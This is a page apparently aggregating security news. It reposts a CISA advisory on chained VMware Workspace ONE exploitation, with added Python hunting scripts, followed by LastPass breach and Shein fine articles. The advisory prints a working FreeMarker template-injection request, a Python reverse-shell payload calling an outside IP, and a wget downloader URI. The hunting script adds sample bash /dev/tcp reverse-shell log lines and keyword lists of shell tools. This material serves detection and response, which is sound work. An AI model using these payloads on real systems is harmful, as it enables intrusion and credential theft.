Author: rescue@crimefire.in

  • Threat Actors Chaining Unpatched VMware Vulnerabilities for Full … – CISA

    Update June 2, 2022:
    This Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. 
    Update End
    The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. CVE-2022-22954 is a server-side template injection that can result in remote code execution (RCE); CVE-2022-22960 is a local privilege escalation, caused by improper permissions on support scripts, that yields root. Chained, the two take an unauthenticated actor with network access to the web interface all the way to root on the appliance.
    VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5 and May 6, 2022, respectively.
    Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released Emergency Directive (ED) 22-03, Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
    CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including IOCs—about observed exploitation at multiple other large organizations from trusted third parties.
    This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. 
    Update June 2, 2022:
    This CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. 
    Update End
    Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
    For a downloadable copy of IOCs, see AA22-138B.stix
    CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
    According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. 
    Update June 2, 2022:
    For more information about this compromised organization, see the Victim 1 section.
    Update End
    Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
    Update June 2, 2022:
    The following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.
    The trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMware Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server by hand (without automation or scripts) and installed multiple webshells and a reverse SOCKS proxy.
    On April 12, TA1 exploited CVE-2022-22954 [T1203] to download [T1105] a malicious shell script [T1059] from https://20.232.97[.]189/up/80b6ae2cea.sh.
    TA1 first targeted FreeMarker, the Java template engine that Workspace ONE Access uses to render customized notifications, by sending the following GET request to the compromised server [T1071.001]:
    GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7D HTTP/1.1
    URL-decoded, the deviceUdid parameter is ${"freemarker.template.utility.Execute"?new()("cat /usr/local/horizon/conf/system-config.properties")}: the template engine instantiates its Execute utility and runs the quoted string as a shell command, here reading the appliance's system-config.properties.
    The GET request resulted in the server downloading the malicious shell script, 80b6ae2cea[.]sh, to the VMware Workspace ONE Access directory /usr/local/horizon/scripts/. TA1 then chained CVE-2022-22960 to the initial exploit to run the shell script with root privileges ([T1068], [TA0004]); the script was executed via sudo.
    The script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [TA0010]. The malicious script collected [TA0009] sensitive files, including user names, passwords, master keys, and firewall rules, and stored them in a tarball (a tar archive, often compressed, that actors commonly use to stage collected data for exfiltration) [T1560]. The tarball was located in the VMware Workspace ONE Access directory /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/.
    The malicious script then deleted evidence of compromise [TA0005] by restoring logs to their original state and deleting files [T1070]. TA1 deleted many files and logs, including fd86ald0.pem, localhost_access logs, logs associated with the VMware Horizon application, and greenbox logs for the date of activity (April 12).
    Note: CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.
    On April 12, TA1 also downloaded jtest.jsp, a JSP webshell, to the server’s web directory /SAAS/Horizon/js-lib/ from IP address 186.233.187[.]245.
    TA1 returned to the server on April 12 to collect sensitive data stored in the “tar ball” by GET request.
    On April 13 and 14, TA2 sent many GET requests to the server exploiting, or attempting to exploit, CVE-2022-22954 to obtain RCE, upload binaries, and upload webshells [T1505.003] for persistence [TA0003].
    The trusted third party found two copies of the Dingo J-spy webshell (MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a) in web directories: horizon_all.jsp was in the /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/ web directory and jquery.jsp was in the /webapps/cas/static/ directory. The third party was unable to determine how and when the webshells were created. TA2 used POST requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [T1573.001].
    On April 14, TA2 downloaded a reverse SOCKS proxy [T1090]. TA2 first sent a GET request with the chmod command to change the permissions of .tmp12865xax, a hidden file in the /tmp directory [T1222.002]. The actor then downloaded a binary (MD5 dc88c5fe715b5f706f9fb92547da948a) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse SOCKS5 tunneling tool with TLS/SSL support and connects to https://149.248.35[.]200.sslip.io. Note: sslip.io is a public wildcard DNS service that resolves a hostname containing an IP address to that address, so the hostname itself carries the C2 endpoint; DNS queries for *.sslip.io from an appliance are a useful hunting pivot.
    The trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On April 13, IP address 172.94.89[.]112 attempted to open a reverse shell from the compromised server to IP address 100.14.239[.]83 on port 5410. The FreeMarker payload (shown decoded) launches python3.7 with a connect-back socket, duplicates that socket onto stdin, stdout and stderr, and starts an interactive /usr/bin/sh:
    freemarker.template.utility.Execute"?new()("/usr/bin/python3.7 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"-i\"]);\'")}
    CISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE-2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as root via sudo. The Bash script also collects network and other system information.
    The script overwrites the publishCaCert.hzn script (keeping a copy of the original as fd86ald0.pem, which it later restores) and executes commands that compress a list of files containing network interface configuration, the list of users, passwords, master keys, hosts, and domains into a TAR archive. The TAR archive, located in the VMware Workspace ONE Access directory /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/, is given read and write permission for the Horizon web user and read permission for all other users, which is why it could later be retrieved with a plain GET request.
    The malicious script then removes evidence of compromise by restoring publishCaCert.hzn from fd86ald0.pem and deleting fd86ald0.pem.
    The trusted third party observed the following IPs downloading, executing, and checking the bash script.
    The trusted third party observed the following additional malicious IPs:
    Update End
    Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. The signatures below match on the HTTP method and URI, so network-based detection and threat hunting require Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption (inspection at a TLS-terminating proxy, or with the server's key material) to see the request.
    The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954. Note: sid:1 is a placeholder inside the range reserved for official rule sets; assign a local SID (1000000 or higher) before loading the rule.
    alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content:"GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954; reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
    The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
    Update June 2, 2022:
    The signature as first published had an empty sid field; the corrected signature is:
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection"; content:"GET"; http_method; content:"freemarker.template.utility.Execute"; nocase; http_uri; priority:1; sid:100000001; rev:1;)
    Update End
    The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
    rule dingo_jspy_webshell
    {
    strings:
    $string1 = "dingo.length"
    $string2 = "command = command.trim"
    $string3 = "commandAction"
    $string4 = "PortScan"
    $string5 = "InetAddress.getLocalHost"
    $string6 = "DatabaseManager"
    $string7 = "ExecuteCommand"
    $string8 = "var command = form.command.value"
    $string9 = "dingody.iteye.com"
    $string10 = "J-Spy ver"
    $string11 = "no permission ,die"
    $string12 = "int iPort = Integer.parseInt"
    condition:
    filesize < 50KB and 12 of ($string*)
    }

    Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
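A file-system hunt built from the IOCs in this CSA, as an added example that is not CISA's or VMware's code: it hashes every file under the web roots against the webshell MD5 values published in Table 1 and flags JSP files or tar archives that sit in directories which should only hold static content, which is where the third party found jtest.jsp, jquery.jsp and the exfiltration tarball. The directory names treated as static-only, the sample tree and the planted file bodies are assumptions made for the example; hashes catch only unmodified copies, which is why the location rule is kept alongside them:

```python
"""Hunt the Workspace ONE Access web roots for the webshell artifacts this
advisory describes.

Added example (editor's code, not CISA's or VMware's). Two checks that the
advisory's IOCs support: match every file's MD5 against the published
webshell hashes, and flag a .jsp or a tar archive sitting in a directory
that should hold only static assets (js-lib, images, static). The sample
tree is constructed in a temporary directory so the script runs offline;
the directory list, the "static-only" rule and the planted file contents
are assumptions made for the example.
"""
import hashlib
import tempfile
from pathlib import Path

# MD5 values published in this advisory (Table 1), lower-cased hex.
KNOWN_WEBSHELL_MD5 = {
    "5b0bfda04a1e0d8dcb02556dc4e56e6a": "Dingo J-spy (horizon_all.jsp / jquery.jsp)",
    "c509282c94b504129ac6ef168a3f08a8": "jspy",
    "4cd8366345ad4068feca4d417738b4bd": "Godzilla (app.jsp)",
}

# Directory names under the web root where a JSP or an archive is suspicious
# (assumption for the example; tune to your deployment).
STATIC_ONLY_DIRS = {"js-lib", "images", "static"}
ARCHIVE_SUFFIXES = (".tar", ".tgz", ".tar.gz")

# Constructed stand-in for a webshell body; NOT the real Dingo J-spy source.
SAMPLE_SHELL_BODY = b'<%@ page import="java.io.*" %><% String c = request.getParameter("cmd"); %>'


def md5_bytes(data):
    return hashlib.md5(data).hexdigest()


def md5_file(path, chunk=1 << 16):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(web_root, known=KNOWN_WEBSHELL_MD5):
    """Return a list of (relative_path, reason) for every suspicious file."""
    web_root = Path(web_root)
    findings = []
    for path in sorted(web_root.rglob("*")):
        if not path.is_file():
            continue
        rel_path = path.relative_to(web_root)
        rel = rel_path.as_posix()
        digest = md5_file(path)
        if digest in known:
            findings.append((rel, "known webshell hash: " + known[digest]))
            continue
        # Only the part of the path below the web root decides "static-only".
        in_static_dir = bool(STATIC_ONLY_DIRS & set(rel_path.parent.parts))
        name = path.name.lower()
        if in_static_dir and name.endswith(".jsp"):
            findings.append((rel, "JSP in static-only directory"))
        elif in_static_dir and name.endswith(ARCHIVE_SUFFIXES):
            findings.append((rel, "archive in static-only directory (possible staged tarball)"))
    return findings


def make_sample_tree():
    """Build a constructed web root in a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="ws1-hunt-"))
    files = {
        "SAAS/horizon/portal/index.jsp": b"<%-- legitimate page --%>",
        "SAAS/horizon/portal/horizon_all.jsp": SAMPLE_SHELL_BODY,  # only caught by hash
        "SAAS/horizon/js-lib/jtest.jsp": SAMPLE_SHELL_BODY,        # caught by location
        "SAAS/horizon/js-lib/jquery.min.js": b"/* js */",
        "SAAS/horizon/images/logo.png": b"\x89PNG\r\n",
        "SAAS/horizon/images/out.tar": b"staged data",              # caught by location
        "cas/static/jquery.jsp": SAMPLE_SHELL_BODY,                # caught by location
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
    return str(root)


if __name__ == "__main__":
    for rel, why in hunt(make_sample_tree()):
        print(f"{why}: {rel}")
```

Run it against /opt/vmware/horizon/workspace/webapps on a suspect appliance and keep the YARA rules above for modified copies: a hit on the hash list is conclusive, a hit on the location rule needs a look at the file. Note that horizon_all.jsp in the sample, planted in a directory that legitimately holds JSPs, is only found when its hash is on the list.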
    Update June 2, 2022:
    The following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:
    rule Godzilla_Webshell
    {
        strings:
            $string1 = "TomcatListenerMemShellFromThread"
            $string2 = "String xc ="
            $string3 = "String pass ="
            $string4 = "ServletRequestListener"
            $string5 = "cmds = new String"
            $string6 = "cmd"
            $string7 = "bin/bash"
            $string8 = "getInputStream"
            $string9 = "javax.crypto.Cipher c = javax.crypto.Cipher.getInstance"
            $string10 = "godzilla"
        condition:
            filesize < 20KB and 10 of ($string*)
    }

    The following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:
    rule Tomcatjsp_Webshell
    {
        strings:
            $string1 = "ExecShellCmd"
            $string2 = "stCommParams"
            $string3 = "nKeyOffset = EncryptData"
            $string4 = "InputStream is = process.getInputStream"
            $string5 = "Process process = Runtime.getRuntime"
            $string6 = "ExecBinary"
            $string7 = "byte bzKey"
            $string8 = "nKeyOffset++"
            $string9 = "HttpServletRequest request, HttpServletResponse response"
            $string10 = "connect_test cmd"
            $string11 = "exec cmd"
            $string12 = "file upload"
        condition:
            filesize < 25KB and 12 of ($string*)
    }

    The following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.
    rule reversesocks_tool
    {
        meta:
            md5 = "dc88c5fe715b5f706f9fb92547da948a"
        strings:
            $string1 = "revsocks"
            $string2 = "-connect"
            $string3 = "client:8080 -pass test"
            $string4 = "RSA TESTING KEY"
            $string5 = "SETTINGS_MAX_CONCURRENT_STREAMS"
            $string6 = "Start on the server:"
            $string7 = "closing connection"
            $string8 = "socks 127.0.0.1:1080"
            $string9 = "revsocks -listen :8080"
        condition:
            uint16(0) == 0x457F and filesize < 6MB and 8 of ($string*)
    }

    Update End
    Administrators should conduct behavioral analysis on root accounts of vulnerable systems by: 
    Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960
    Used around April 12–14, 2022 (Updated June 2, 2022)

    Indicator (request URI): /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
    Indicator (request URI): /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://[REDACTED]/one")}
    Notes: Search for this function in /opt/vmware/horizon/workspace/logs/greenbox_web.log (Update June 2, 2022: or any rotated copy matched by /opt/vmware/horizon/workspace/logs/greenbox_web.log*). freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. URL decode the logs before searching for freemarker.template.utility.Execute, since the payload arrives URL-encoded.

    Indicator (webshell): horizon.jsp (June 2, 2022 update: also jquery.jsp), MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a
    Indicator (webshell): jspy (June 2, 2022 update: MD5 c509282c94b504129ac6ef168a3f08a8)
    Indicator (webshell): godzilla (June 2, 2022 update: app.jsp, MD5 4cd8366345ad4068feca4d417738b4bd)

    Update May 25, 2022: see Palo Alto Networks Unit 42 Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.
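The Table 1 hunting step (URL-decode the log, then search for freemarker.template.utility.Execute) applied to request log lines, as an added example written for this page rather than taken from the advisory. It assumes a constructed log line format (timestamp, client IP, method, URI, status) and documentation-range IP addresses; the keyword lists used to triage the recovered command are likewise the editor's, not CISA's. Beyond the plain search, it recovers the shell command from each payload, so the same pass classifies the recon, wget downloader and reverse-shell requests of the kind quoted earlier in this CSA:

```python
"""Hunt Workspace ONE Access request logs for CVE-2022-22954 template injection.

Added example (editor's code, not CISA's). It follows the Table 1 guidance:
URL-decode each line first, then look for freemarker.template.utility.Execute
and recover the shell command handed to it. The log lines below are
constructed for the example (documentation-range IPs); real greenbox_web.log
lines carry different fields, so only the URI part matters to the matcher.
"""
import re
from urllib.parse import unquote

# FreeMarker's Execute utility runs a shell command; this is the advisory's marker.
MARKER = "freemarker.template.utility.Execute"

# Decoded payload shape:  ${"freemarker.template.utility.Execute"?new()("<command>")}
PAYLOAD_RE = re.compile(
    r'\$\{\s*"' + re.escape(MARKER) + r'"\s*\?new\(\)\(\s*"(?P<cmd>.*?)"\s*\)\s*\}',
    re.DOTALL,
)

# Coarse triage of the recovered command; keyword lists are the editor's
# assumption, ordered so the most specific class wins.
TRIAGE = [
    ("reverse_shell", ("socket.socket", "os.dup2", "/dev/tcp/", "nc -e", "bash -i")),
    ("downloader", ("wget ", "curl ", "http://", "https://")),
    ("recon", ("cat /etc/", "system-config.properties", "whoami", "uname -a")),
]

# Constructed sample: three exploitation attempts and one benign request.
SAMPLE_LOG = [
    "2022-04-12 10:02:11 198.51.100.20 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid="
    "%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/etc/hosts%22%29%7D 200",
    "2022-04-12 10:05:43 198.51.100.20 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid="
    "%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22wget%20-U%20%22Hello%201.0%22"
    "%20-qO%20-%20http%3A//203.0.113.10/one%22%29%7D 200",
    "2022-04-12 10:06:02 192.0.2.7 GET /SAAS/auth/login 200",
    "2022-04-13 14:21:09 198.51.100.77 GET /catalog-portal/ui/oauth/verify?error=&deviceUdid="
    "%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22bash%20-i%20%3E%26%20"
    "/dev/tcp/203.0.113.5/5410%200%3E%261%22%29%7D 200",
]


def triage(command):
    """Label a recovered command; None means the marker was seen but no command parsed."""
    if command is None:
        return "marker_only"
    for label, needles in TRIAGE:
        if any(n in command for n in needles):
            return label
    return "unknown"


def extract_commands(log_lines):
    """Return one finding dict per line that carries an Execute payload.

    Decoding runs twice so a double-encoded URI is still caught; on a line
    that is already plain text the second pass changes nothing unless the
    command itself contains a literal percent-escape.
    """
    findings = []
    for n, raw in enumerate(log_lines, start=1):
        decoded = unquote(unquote(raw))
        if MARKER not in decoded:
            continue
        m = PAYLOAD_RE.search(decoded)
        cmd = m.group("cmd") if m else None
        findings.append({"line_no": n, "command": cmd, "triage": triage(cmd), "raw": raw})
    return findings


if __name__ == "__main__":
    for f in extract_commands(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['triage']}: {f['command']}")
```

Feed it the decoded or raw greenbox_web.log* files (for example, `extract_commands(open(path).readlines())`); a "marker_only" result means the marker appeared in a form the regex did not parse and deserves a manual look rather than dismissal.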
    If administrators discover system compromise, CISA recommends they:
    CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.
    CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
    Update June 2, 2022:
    Threat actors and their malware have used the TTPs in Table 2 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.
    Table 2: MITRE ATT&CK TTPs
    File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification [T1222.002]
    Indicator Removal on Host [T1070]
    Archive Collected Data [T1560]
    Update End
    Revisions: initial version May 18, 2022 | May 25, 2022: added industry resource | June 2, 2022: added detection signatures, IOCs, and TTPs

    source

  • Timeline of the latest LastPass data breaches – CSO Online

    By Michael Hill, UK Editor, CSO
    On November 30, 2022, password manager LastPass informed customers of a cybersecurity incident following unusual activity within a third-party cloud storage service. While LastPass claims that users’ passwords remain safely encrypted, it admitted that certain elements of customers’ information have been exposed. The security incident was the latest to affect the service in recent times, in the wake of unauthorized access to its development environment in August 2022, serious vulnerabilities in 2017, a phishing attack in 2016, and a data breach in 2015.
    Here is a timeline of the most recent LastPass data breaches from August to present.
    [Editor’s note: This article, originally published on January 11, 2023, will be updated as new information becomes available.]
    LastPass CEO Karim Toubba wrote to inform LastPass users that the company had detected unusual activity within portions of the LastPass development environment. “We have determined that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account and took portions of source code and some proprietary LastPass technical information. Our products and services are operating normally.”
    In response to the incident, LastPass deployed containment and mitigation measures and engaged a cybersecurity and forensics firm, Toubba added. “While our investigation is ongoing, we have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity.”
    LastPass announced that it had completed its investigation of the August breach and determined that the attacker did not access any customer data or password vaults. It also confirmed that the access point was a developer’s compromised computer and that the attacker was in the system for a total of four days.
    LastPass notified users of a new security incident that its team was investigating. “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo. We immediately launched an investigation, engaged Mandiant, a leading security firm, and alerted law enforcement,” Toubba wrote.
    The company determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain customers’ information, Toubba said, while stating that passwords remained safely encrypted due to LastPass’s Zero Knowledge architecture. “We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” he added. Users were advised to follow best practices around the setup and configuration of LastPass.
    Yoav Iellin, senior researcher at Silverfort, stated that given the vast number of passwords LastPass protects globally, it remains a big attack target. “The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused.”
    Iellin urged users to stay vigilant for updates from the company and to take time to verify these were legitimate before taking any action. “In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass and changing passwords will provide the utmost level of security,” Iellin added.
    In an update on the investigation, Toubba stated source code and technical information stolen from the LastPass development environment were used to target an employee and obtain credentials/keys, which were used to access and decrypt some storage volumes within a cloud-based storage service. “To date, we have determined that once the cloud storage access key and dual storage container decryption keys were obtained, the threat actor copied information from backup that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass services,” Toubba wrote.
    The threat actor was also able to copy a backup of customer vault data from the encrypted storage container, which is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data, he added. “There is no evidence that any unencrypted credit card data was accessed.”
    Toubba warned that the threat actor may attempt to brute-force master passwords in order to decrypt the copies of vault data they took, but, because of the hashing and encryption methods LastPass uses, doing so would be extremely difficult for customers who follow its password best practices, he continued.
    “The threat actor may also target customers with phishing attacks, credential stuffing, or other brute-force attacks against online accounts associated with your LastPass vault.” LastPass added additional logging and alerting capabilities to help detect any further unauthorized activity and is actively rotating all relevant credentials and certificates that may have been affected and supplementing existing endpoint security, Toubba stated. “We are also performing an exhaustive analysis of every account with signs of any suspicious activity within our cloud storage service, adding additional safeguards within this environment, and analyzing all data within this environment to ensure we understand what the threat actor accessed. This remains an ongoing investigation. We have notified law enforcement and relevant regulatory authorities of this incident out of an abundance of caution. In the meantime, our services are running normally, and we continue to operate in a state of heightened alert.”
    An anonymous plaintiff filed a class action lawsuit against LastPass relating to the data breaches. “This is a class action for damages against Defendant for its failure to exercise reasonable care in securing and safeguarding highly sensitive consumer data in connection with a massive, months-long data breach,” the lawsuit read. Highly sensitive data was exposed, it continued, impacting potentially millions of LastPass users, resulting in the unauthorized public release and subsequent misuse of their names, end-user names, billing addresses, email addresses, telephone numbers, IP addresses from which customers were accessing the LastPass service, and customer vault data. The lawsuit claimed that LastPass’ “best practices” were woefully insufficient to protect its users’ private information from compromise and misuse.
    In an update on the ongoing investigation into the security incident, Paddy Srinivasan, CEO of LastPass parent company GoTo, stated that a threat actor exfiltrated encrypted backups from a third-party cloud storage service related to the following products: Central, Pro, join.me, Hamachi, and RemotelyAnywhere. “We also have evidence that a threat actor exfiltrated an encryption key for a portion of the encrypted backups. The affected information, which varies by product, may include account usernames, salted and hashed passwords, a portion of multi-factor authentication (MFA) settings, as well as some product settings and licensing information. In addition, while Rescue and GoToMyPC encrypted databases were not exfiltrated, MFA settings of a small subset of their customers were impacted,” Srinivasan wrote.
    At the time of writing, Srinivasan claimed there was no evidence of exfiltration affecting any other GoTo products other than those referenced or any of GoTo’s production systems. “We are contacting affected customers directly to provide additional information and recommend actionable steps for them to take to further secure their accounts,” Srinivasan added. “Even though all account passwords were salted and hashed in accordance with best practices, out of an abundance of caution, we will also reset the passwords of affected users and/or reauthorize MFA settings where applicable. In addition, we are migrating their accounts onto an enhanced Identity Management Platform, which will provide additional security with more robust authentication and login-based security options.”
    A LastPass update on its second breach confirmed that it was related to the initial incident that ended on August 12, 2022. The company claimed that the connection was not obvious because the attacker’s tactics, techniques, and procedures (TTPs) and the indicators of compromise (IOCs) “were not consistent with those of the first [breach].”
    The second attack did make use of information exfiltrated during the initial incident: valid credentials of a senior DevOps engineer who had access to a shared cloud storage environment. This made the attacker’s activity difficult to identify, as it appeared to be legitimate. AWS GuardDuty alerts did notify LastPass of anomalous behavior after the attacker attempted to use cloud identity and access management (IAM) roles for unauthorized activity.
    Michael Hill is the UK editor of CSO Online. He has spent the past five-plus years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security.
    Copyright © 2023 IDG Communications, Inc.

    source

  • Shein Holding Company Fined $1.9m For Not Disclosing Data Breach – Infosecurity Magazine

    Zoetop, the holding company behind the retail giants Shein and Romwe, has been fined $1.9m after it failed to properly inform customers of a data breach that reportedly affected millions of users.
    According to a notice from the New York attorney general's office this week, in the 2018 data breach Zoetop failed to secure customers' data, did not adequately inform customers of the breach, and tried to play down its real impact.
    The 2018 hack involved the theft of credit card data and personal information, including names, email addresses and hashed passwords. The breach reportedly affected 39 million Shein and seven million Romwe accounts, more than 800,000 of which belonged to New Yorkers.
    "Shein and Romwe's weak digital security measures made it easy for hackers to shoplift consumers' personal data," said New York attorney general Letitia James.
    "[They] must button up their cybersecurity measures to protect consumers from fraud and identity theft. This agreement should send a clear warning to companies that they must strengthen their digital security measures and be transparent with consumers; anything less will not be tolerated."
    More generally, risks connected to an organization not disclosing that it has been breached are substantial, according to Patrick Wragg, cyber incident response manager at Integrity360.
    Talking to Infosecurity, the executive said the first type of risk is financial. 
    "Not only will the organization suffer from operational issues (disruption to service) and therefore loss of revenue, but if they do not disclose the breach to the likes of the ICO (especially if customer data is stolen), the fines are often exponentially bigger than the threat actor ransom itself," Wragg explained.
    Further, companies may suffer reputational and trust risks should they neglect to disclose a data breach.
    "If customers find out that their data was stolen and the company tried to hide the fact, then they will be much less likely to use that company in the future due to trust," Wragg said.
    "Companies/partners will [also] be less likely to do business with a company that has purposely not disclosed a breach because they don't want to get caught in the 'black hole' of negative reception."
    The Zoetop news comes in the wake of two data breaches in Australia affecting subsidiaries of the telecommunications giant Singtel.

    source

  • The UN Cybercrime Treaty Has a Cybersecurity Problem In It – Just Security

    October 17, 2022
